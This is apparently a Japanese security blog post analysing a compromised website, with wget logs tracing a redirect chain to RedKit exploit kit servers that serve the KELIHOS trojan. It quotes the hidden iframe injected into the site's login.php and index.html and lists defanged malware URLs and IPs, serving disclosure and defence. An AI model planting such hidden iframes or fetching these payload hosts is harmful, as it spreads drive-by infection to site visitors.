210.224.185.225 / keiyuka3153.sakura.ne.jp下記の感染URLを発見し…
hxxp://keiyuka3153.sakura.ne.jp/index.html hxxp://keiyuka3153.sakura.ne.jp/o/login.phpダウンロード証拠は…
--2013-03-10 16:31:09-- hxxp://keiyuka3153.sakura.ne.jp/o/login.php Resolving keiyuka3153.sakura.ne.jp... seconds 0.00, 210.224.185.225 Caching keiyuka3153.sakura.ne.jp => 210.224.185.225 Connecting to keiyuka3153.sakura.ne.jp|210.224.185.225|:80... seconds 0.00, connected. : GET /o/login.php HTTP/1.0 Host: keiyuka3153.sakura.ne.jp HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Sun, 10 Mar 2013 07:31:03 GMT Server: Apache/2.2.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=107571ab7c056c4b89525b02d199ec25; path=/ Content-Length: 638 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive Content-Type: text/html 200 OK Stored cookie keiyuka3153.sakura.ne.jp -1 (ANY) /中身はマルウェア感染URLを発見しました(IFRAMEで)…[expiry none] PHPSESSID 107571ab7c056c4b89525b02d199ec25 Length: 638 [text/html] Saving to: `login.php' 2013-03-10 16:31:09 (17.3 MB/s) - `login.php' saved [638/638] : : GET /index.html HTTP/1.0 Host: keiyuka3153.sakura.ne.jp HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Sun, 10 Mar 2013 08:12:07 GMT Server: Apache/2.2.23 Last-Modified: Fri, 01 Mar 2013 05:31:48 GMT ETag: "f865c-1628-4d6d652d6d900" Accept-Ranges: bytes Content-Length: 5672 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive Content-Type: text/html 200 OK Length: 5672 (5.5K) [text/html] Saving to: `index.html' 2013-03-10 17:12:13 (42.6 MB/s) - `index.html' saved [5672/5672]
//cat login.phpをするとライン16に下記のマルウェアIFRAMEを発見↓
:
<iframe name=Twitter
scrolling=auto
frameborder=no
align=center
height=2
width=2 src=hxxp://jancoral(.)ierealtysite.com/whci(.)html?i=1239289>
</iframe>
:
//さらに、index.htmlのライン89番に同じコードも発見しました。クリックされたら、下記のルートでトロイ「KELIHOS」マルウェアがダウンロードされてしまいます…2013-03-10 17:18:43-- hxxp://jancoral.ierealtysite.com/whci.html?i=1239289 Resolving jancoral.ierealtysite.com... seconds 0.00, 69.89.31.243 Caching jancoral.ierealtysite.com => 69.89.31.243 Connecting to jancoral.ierealtysite.com|69.89.31.243|:80... seconds 0.00, connected. : GET /whci.html?i=1239289 HTTP/1.0 Referer: hxxp://keiyuka3153.sakura.ne.jp/index.html HTTP request sent, awaiting response... : HTTP/1.1 301 Moved Permanently Date: Sun, 10 Mar 2013 08:18:37 GMT Server: Apache Location: hxxp://ttnetofisi(.)com/whci.htm?i=1239289 Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=10, max=30 Connection: Keep-Alive Content-Type: text/html : : //ここでttnetofisi(.)comに転送されます。。。 : --2013-03-10 17:18:44-- hxxp://ttnetofisi(.)com/whci.htm?i=1239289 conaddr is: 69.89.31.243 Resolving ttnetofisi(.)com... seconds 0.00, 173.254.28.58 Caching ttnetofisi(.)com => 173.254.28.58 Found ttnetofisi(.)com in host_name_addresses_map (00A270C0) Connecting to ttnetofisi(.)com|173.254.28.58|:80... seconds 0.00, connected. : GET /whci.htm?i=1239289 HTTP/1.0 Referer: hxxp://keiyuka3153.sakura.ne.jp/index.html Host: ttnetofisi(.)com HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Sun, 10 Mar 2013 08:18:38 GMT Server: Apache Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=10, max=30 Connection: Keep-Alive Content-Type: text/html 200 OK↑全てリダイレクト動きは下記のホストに向いているので…
Name: jancoral.ierealtysite.com Address: 69.89.31.243それと…
Name: ttnetofisi(.)com Address: 173.254.28.58↑両方は「RedKit Exploit Kit」マルウェア感染サーバです。
証拠は全国の感染DB情報となります↓
ttnetofisi(.)com/332.jar、又は↓ kablonetbasvurusu.()com/987.pdf kablolutelevizyon(.)com/887.jar、若しくは↓ : jancoral.ierealtysite(.)com/whci.html?i=1239289 mariaflores.iemysite(.)com/ozcf.html?j=1411969 :↑などなど(両方IPに未だ沢山KELIHOS感染URLがあります)
恐らくサーバの管理者ログイン情報が漏れてしまいましたそうです。
0 件のコメント:
コメントを投稿